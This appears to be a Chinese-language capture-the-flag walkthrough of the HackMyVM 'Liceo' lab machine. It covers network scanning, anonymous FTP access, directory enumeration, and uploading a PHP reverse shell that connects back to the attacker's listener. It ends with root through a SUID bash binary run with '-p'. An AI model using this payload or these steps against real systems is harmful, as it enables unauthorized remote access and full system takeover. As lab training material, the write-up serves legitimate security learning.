HakcMyVM-Liceo

Liceo

信息搜集

主机发现

┌──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.2.0/24 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-18 09:57 EDT

Nmap scan report for liceoserver (192.168.2.2)
Host is up (0.00031s latency).
MAC Address: 08:00:27:69:22:0B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap scan report for kali (192.168.2.15)
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 4.95 seconds

端口扫描

┌──(kali㉿kali)-[~]
└─$ nmap -sV -p- 192.168.2.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-18 09:58 EDT
Nmap scan report for liceoserver (192.168.2.2)
Host is up (0.00055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
MAC Address: 08:00:27:69:22:0B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.84 seconds

漏洞利用

看一下21端口有什么

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.2.2  
Connected to 192.168.2.2.
220 (vsFTPd 3.0.5)
Name (192.168.2.2:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||33942|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000          191 Feb 01  2024 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||22377|)
150 Opening BINARY mode data connection for note.txt (191 bytes).
100% |************************|   191      463.98 KiB/s    00:00 ETA
226 Transfer complete.
191 bytes received in 00:00 (249.69 KiB/s)
┌──(kali㉿kali)-[~]
└─$ cat note.txt 
Hi Matias, I have left on the web the continuations of today's work, 
would you mind contiuing in your turn and make sure that the web will be secure? 
Above all, we dont't want intruders...

得到一个用户名Matias，目录枚举一下

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git -u http://192.168.2.2
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              png,zip,git,html,php,txt,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 276]
/images               (Status: 301) [Size: 311] [--> http://192.168.2.2/images/]                                                          
/index.html           (Status: 200) [Size: 21487]
/.html                (Status: 403) [Size: 276]
/uploads              (Status: 301) [Size: 312] [--> http://192.168.2.2/uploads/]                                                         
/upload.php           (Status: 200) [Size: 371]
/css                  (Status: 301) [Size: 308] [--> http://192.168.2.2/css/]                                                             
/js                   (Status: 301) [Size: 307] [--> http://192.168.2.2/js/]                                                              
/.php                 (Status: 403) [Size: 276]
/.html                (Status: 403) [Size: 276]
/server-status        (Status: 403) [Size: 276]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 276]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

发现了/upload.php页面，和/uploads/目录，看一下/upload.php页面

可以上传文件，尝试上传一个反弹shell

<?php
$sock=fsockopen("192.168.2.15",1234);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>

访问一下http://192.168.2.2/uploads/shell.phtml

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.2.15] from (UNKNOWN) [192.168.2.2] 42188
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

权限提升

bash-5.1$ ls -la
ls -la
total 16
drwxr-xr-x 2 www-data www-data 4096 Apr 18 14:40 .
drwxr-xr-x 7 root     root     4096 Feb 10  2024 ..
-rw-r--r-- 1 www-data www-data   38 Apr 18 14:35 shell..phtml
-rw-r--r-- 1 www-data www-data  113 Apr 18 14:40 shell.phtml
bash-5.1$ cd ..
cd ..
bash-5.1$ ls -la
ls -la
total 592
drwxr-xr-x 7 root     root       4096 Feb 10  2024 .
drwxr-xr-x 3 root     root       4096 Feb 10  2024 ..
drwxr-xr-x 2 www-data www-data   4096 Sep 16  2020 css
drwxr-xr-x 2 www-data www-data   4096 Sep 16  2020 images
-rw-r--r-- 1 www-data www-data  21487 Feb 10  2024 index.html
drwxr-xr-x 2 www-data www-data   4096 Sep 16  2020 js
-rw-r--r-- 1 www-data www-data 547090 Feb  4  2024 liceoweb.zip
drwxr-xr-x 2 www-data www-data   4096 Feb  3  2024 spering-html
-rw-r--r-- 1 www-data www-data   1501 Feb 10  2024 upload.php
drwxr-xr-x 2 www-data www-data   4096 Apr 18 14:40 uploads
bash-5.1$ cd ..
cd ..
bash-5.1$ ls -la
ls -la
total 16
drwxr-xr-x  3 root root 4096 Feb 10  2024 .
drwxr-xr-x 14 root root 4096 Feb  1  2024 ..
-rw-------  1 root root   73 Feb 11  2024 .bash_history
drwxr-xr-x  7 root root 4096 Feb 10  2024 html
bash-5.1$ sudo -l
sudo -l
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts
//查找SUID文件
bash-5.1$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/snap/snapd/20671/usr/lib/snapd/snap-confine
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/2105/usr/bin/chfn
/snap/core20/2105/usr/bin/chsh
/snap/core20/2105/usr/bin/gpasswd
/snap/core20/2105/usr/bin/mount
/snap/core20/2105/usr/bin/newgrp
/snap/core20/2105/usr/bin/passwd
/snap/core20/2105/usr/bin/su
/snap/core20/2105/usr/bin/sudo
/snap/core20/2105/usr/bin/umount
/snap/core20/2105/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2105/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/umount
/usr/bin/sudo
/usr/bin/bash
/usr/bin/fusermount3
/usr/libexec/polkit-agent-helper-1
//使用-p参数，-p会阻止bash降权，使进程保留SUID赋予的EUID。
bash-5.1$ /usr/bin/bash -p
/usr/bin/bash -p
bash-5.1# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)